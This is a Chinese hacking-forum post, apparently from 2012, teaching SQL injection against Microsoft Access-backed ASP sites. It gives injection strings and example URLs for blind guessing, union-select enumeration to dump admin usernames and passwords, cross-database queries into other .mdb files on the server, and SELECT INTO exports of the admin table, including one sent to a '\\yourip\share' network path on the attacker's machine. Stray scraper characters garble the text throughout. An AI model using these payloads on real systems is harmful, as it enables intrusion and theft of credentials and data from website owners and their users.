--------------------------------------------------------------
+ L. [# s6 }! |* `3 S5 n& N* Cunion查询法
' D' i1 e6 o8 g9 W首先要说的就是查询办法,一般的查询办法就是
' N* n4 v5 U L" m& J
$ R) V) c: [1 t5 ]) K1 V0 \程序代码( V' {' c5 z% w, x4 c2 e
and 1=(select count(*) from admin where left(id,1)='1')
' T' U: g; c2 N0 i; S0 a' o. b6 t$ x+ Q" |4 u' g2 v. T
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
# ?5 q8 f& D, E/ h" \所以这个时候,union select横空出现.别以为只能在PHP里用哦...8 P h0 O- L9 T) y+ H3 w+ P% v
譬如你有一个ACCESS点:" y) q: c, @' }, U
程序代码* G8 S) z" b; [9 w
http://bbs.tian6.com/xiaoyang.asp?coder=1
8 q7 v: x' d& X- ~
9 C$ b1 M) c$ z# u7 V6 A知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),; Y& K, T, g& E, J3 S- L7 z
然后我们直接来:1 N( j: E! a0 v' \ J
程序代码
0 ]7 m- y9 n) I/ G* ghttp://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]
* G1 F; B }, k" x, e( w. M( o/ ?) w, H. f
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
2 W: `+ K, e& T+ d# l
* Z# j# X+ ~. g) [0 O3 R) k/ r) X# C% C9 m
* O( O5 U. n2 h' ~ v. H% B---------------------------------------------------------------
9 l `7 k4 i5 H7 mAccess跨库查询, s9 U! I/ @; C1 B0 W
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.2 D' o% Y0 D& h# U& b' E1 z) C
跨库的查询语句:4 t* p* Q# @+ I; T( y, g5 P
子查询:
# w% @0 j- s o/ X# v3 h( H程序代码
; u E1 ^+ A0 t' `* y1 ?and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0" s( F5 x6 ~! q. O
! b3 u# o5 C, [$ o0 l( V. f
union查询:. g$ Q3 g* g% ^7 ]
程序代码; }$ Y7 m7 d! ^
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
g3 |" e. A5 H) o; |, J) v, B
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
& R$ ]7 @8 p' w+ ]& j程序代码
' K& K8 D% [- m) C# V9 Yhttp://www.4ngel.net/article/46.htm 4 E* g; ^+ U. J( L- ~: j5 H
http://hf110.com/Article/hack/rqsl/200502/66.html) Z: y4 h: X& X' H* q+ i6 v" z, S! b
) O% c5 j7 z+ y9 j
---------------------------------------------------------------' }! a0 u! E3 l0 x0 g
Access注入,导出txt,htm,html
& }: M, d# O" i% s8 z5 g8 X子查询语句:
* `$ o7 t/ G) u程序代码; \% \. U- S* l. w. |
Select * into [test.txt] in 'd:\web\' 'text;' from admin7 s% ]5 b M* M8 C; g0 N0 Q4 a
0 @, X8 t6 g4 v2 P) A
这样就把admin表的内容以test类型存进了d:\web里面., |+ W w8 [8 [7 j0 L
UNION查询:
$ @+ J' d# P5 F) t程序代码 R3 i9 p R4 S6 G0 o
union select * into [admin.txt] in 'c:\' 'test;' from admin
) \ w( ]6 @5 y" t: C5 z3 J" D8 t t1 u( W- z8 b9 `
而且这里也可以保存到本地来:" {1 Z, [4 N* m& s
程序代码6 g2 @! K! t0 _5 Z8 C
Select * into [test.txt] in '\\yourip\share' 'text;' from admin
! ^& Y; s( o w, Q" K) d# g, S* W% K/ y. Q4 `
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
% |/ g% p7 h Z& U- m* t) ~3 r/ h, p1 q L4 j e6 v) R) R; a
程序代码
6 ]: Y) E+ K" S, M* |http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7- w+ a$ W" L2 L; P" b$ S( I2 s
7 h9 O. O) i* O, N G因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.3 }4 Y0 @/ E' ^- G" A8 T7 _6 Q
|
发表于 2012-9-15 14:20:57
收藏
支持
反对